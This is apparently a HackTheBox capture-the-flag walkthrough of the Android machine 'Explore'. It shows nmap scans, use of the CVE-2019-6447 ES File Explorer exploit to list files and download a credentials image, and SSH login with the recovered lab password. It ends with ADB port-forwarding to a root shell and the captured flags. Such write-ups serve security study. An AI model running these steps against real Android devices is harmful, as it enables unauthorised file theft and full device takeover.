Explore

#Android #Enumeration #Port-Forwarding #ESFileExplorer #ADB

Explore is an easy-rated Android machine from HackTheBox created by Bertolis. It was hard to find the exploit. I don't have previous experience with attacking Android machines. You can use Metasploit on this machine, but there are still alternatives to exploit the vulnerability. For privilege escalation, the only technique used is Port Forwarding. In the current post, my IP is 10.10.14.52, and the target IP is 10.129.188.159.

Gathering Information

First, we are going to start with checking if the machine is alive, then do the classic reconnaissance to get some general information about the target.

Local Terminal
ping -c 1 10.129.188.159


Pinging 10.129.188.159 with 32 bytes of data:
Reply from 10.129.188.159: bytes=32 time=152ms TTL=63
Reply from 10.129.188.159: bytes=32 time=162ms TTL=63
Reply from 10.129.188.159: bytes=32 time=161ms TTL=63
Reply from 10.129.188.159: bytes=32 time=168ms TTL=63

Ping statistics for 10.129.188.159:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 152ms, Maximum = 168ms, Average = 160ms

The machine is working, by the "Target Description" we know that is an Android device, but without that information we can think at first glance that is a Linux Machine (TTL <= 64)

Local Terminal
nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.129.188.159 -oN PortScan

Nmap scan report for 10.129.188.159
Host is up, received user-set (0.16s latency).
Scanned at 2023-05-08 18:34:29 Pacific SA Standard Time for 14s
Not shown: 65530 closed tcp ports (reset), 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      REASON
2222/tcp  open  EtherNetIP-1 syn-ack ttl 63
42135/tcp open  unknown      syn-ack ttl 63
42239/tcp open  unknown      syn-ack ttl 63
59777/tcp open  unknown      syn-ack ttl 63

Read data files from: C:\Program Files (x86)\Nmap
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
           Raw packets sent: 70480 (3.101MB) | Rcvd: 70426 (2.817MB)
Local Terminal
nmap -sCV -p 2222,42135,42239,59777 10.129.188.159 -oN WebScan

Starting Nmap 7.92 ( https://nmap.org ) at 2023-05-09 11:43 Pacific SA Standard Time
Nmap scan report for 10.129.188.159
Host is up (0.21s latency).

PORT      STATE SERVICE VERSION
2222/tcp  open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
42135/tcp open  http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: ES Name Response Server
42239/tcp open  unknown
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:32 GMT
|     Content-Length: 22
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|   GetRequest:
|     HTTP/1.1 412 Precondition Failed
|     Date: Tue, 09 May 2023 15:43:32 GMT
|     Content-Length: 0
|   HTTPOptions:
|     HTTP/1.0 501 Not Implemented
|     Date: Tue, 09 May 2023 15:43:37 GMT
|     Content-Length: 29
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Method not supported: OPTIONS
|   Help:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 26
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line: HELP
|   RTSPRequest:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:37 GMT
|     Content-Length: 39
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     valid protocol version: RTSP/1.0
|   SSLSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 73
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ?G???,???`~?
|     ??{????w????<=?o?
|   TLSSessionReq:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:55 GMT
|     Content-Length: 71
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|     ??random1random2random3random4
|   TerminalServerCookie:
|     HTTP/1.0 400 Bad Request
|     Date: Tue, 09 May 2023 15:43:54 GMT
|     Content-Length: 54
|     Content-Type: text/plain; charset=US-ASCII
|     Connection: Close
|     Invalid request line:
|_    Cookie: mstshash=nmap
59777/tcp open  http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
<...>
Service Info: Device: phone

That's a lot of information, we are going to explore every http port first.

  • Browser: http://10.129.188.159:2222

  • Browser: http://10.129.188.159:42135/

Local Terminal
whatweb http://10.129.188:159:2222
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:2222"

whatweb http://10.129.188:159:42135
Prepare Target Failed - bad URI(is not URI?): "http://10.129.188:159:42135"

From the basic gathering, beside than the target being a phone, thanks to the second nmap scan, we don't have a lot of relevant information. Now we have to search information about: "Banana Studio" and "ES File Explorer" to learn about the target.

Local Terminal
searchsploit ES File Explorer

Output: "https://www.exploit-db.com/exploits/50070", we don't know if this version is vulnerable, but we doesn't lose anything by trying.

Local Terminal
batcat exploit.py

  13    if len(sys.argv) < 3: # Information about how to use
  14        print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
  15        sys.exit(1)
  
  21    if cmd not in cmds: # List of available commands 
  22        print("[-] WRONG COMMAND!")
  23        print("Available commands : ")
  24        print("  listFiles         : List all Files.")
  25        print("  listPics          : List all Pictures.")
  26        print("  listVideos        : List all videos.")
  27        print("  listAudios        : List all audios.")
  28        print("  listApps          : List Applications installed.")
  29        print("  listAppsSystem    : List System apps.")
  30        print("  listAppsPhone     : List Communication related apps.")
  31        print("  listAppsSdcard    : List apps on the SDCard.")
  32        print("  listAppsAll       : List all Application.")
  33        print("  getFile           : Download a file.")
  34        print("  getDeviceInfo     : Get device info.")
  35        sys.exit(1)

Exploitation

All right, let's try if it works!

Local Terminal
python3 exploit.py listFiles 10.129.188.159

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : lib
time : 3/25/20 05:12:02 AM
type : folder
size : 12.00 KB (12,288 Bytes)

name : vndservice_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 65.00 Bytes (65 Bytes)

name : vendor_service_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)

name : vendor_seapp_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 0.00 Bytes (0 Bytes)

name : vendor_property_contexts
time : 5/8/23 11:35:53 AM
type : file
size : 392.00 Bytes (392 Bytes)

<...>

It works! but there is nothing relevant here, let's try with another command.

Local Terminal
python3 exploit.py listPics 10.129.188.159

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg # Look what we found! This is interesting.
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

Perfect, we find the path of a credential related file, and in the 50070.py there is a command to download files.

Local Terminal
python3 exploit.py getFile 10.129.188.159 /storage/emulated/0/DCIM/creds.jpg

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...
[+] Done. Saved as `out.dat`.
Local Terminal
mv out.dat out.png
display out.png

A weird way to get receive the password, now we can try to connect through ssh {kristi : Kr1sT!5h@Rp3xPl0r3!}

Local Terminal
ssh kristi@10.129.188.159 -p 2222 
Unable to negotiate with 10.129.188.159 port 2222: no matching host key type found. Their offer: ssh-rsa
Local Terminal
ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222

# pass: Kr1sT!5h@Rp3xPl0r3!

And we are in, now it's time to find the user flag.

Target Terminal [u0_a76]
:/ $ whoami
u0_a76

:/ $ find \-name user.txt 2>/dev/null

Nothing, this means that the flag is inside the SSD.

Target Terminal [u0_a76]
:/ $ cd sdcard
:/sdcard $ ls
Alarms  DCIM     Movies Notifications Podcasts  backups   user.txt
Android Download Music  Pictures      Ringtones dianxinos
:/sdcard $ cat user.txt
f32017174c7c7e8f50c6da52891ae250

Privilege Escalation

After exploring the whole machine, the way to solve it was by using "Port Forwarding"

Target Terminal [u0_a76]
netstat -nat
Active Internet connections (established and servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp6       0      0 :::59777                :::*                    LISTEN
tcp6       0      0 ::ffff:10.129.188:44485 :::*                    LISTEN
tcp6       0      0 ::ffff:127.0.0.1:44491  :::*                    LISTEN
tcp6       0      0 :::2222                 :::*                    LISTEN
tcp6       0      0 :::5555                 :::*                    LISTEN
tcp6       0      0 :::42135                :::*                    LISTEN
tcp6       0    208 ::ffff:10.129.188.:2222 ::ffff:10.10.14.50:6518 ESTABLISHED

If we compare with nmap, there is a new working port, the "5555", by default in android devices this port is ADB, and it's running, so we can try to use it, open a new local terminal.

Local Terminal
ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.129.188.159 -p 2222 -L 5555:127.0.0.1:5555

# pass: Kr1sT!5h@Rp3xPl0r3!

After connecting, you want to connect to the target port 5555, to see if is working, open a new local terminal.

Local Terminal II
lsof -i:5555

If this works, that means that you can use the port 5555 as if were yours.

Local Terminal II
adb connect localhost:5555 #Another way to test if is working
adb -s localhost:5555 shell #With this you will connect.
Target Terminal [u0_a76]
su
Target Root
:/ # whoami
root
:/ # find -name root.txt 2>/dev/null
./data/root.txt
1|:/ # cat ./data/root.txt
f04fc82b6d49b41c9b08982be59338c5
PreviousCapNextForest

Last updated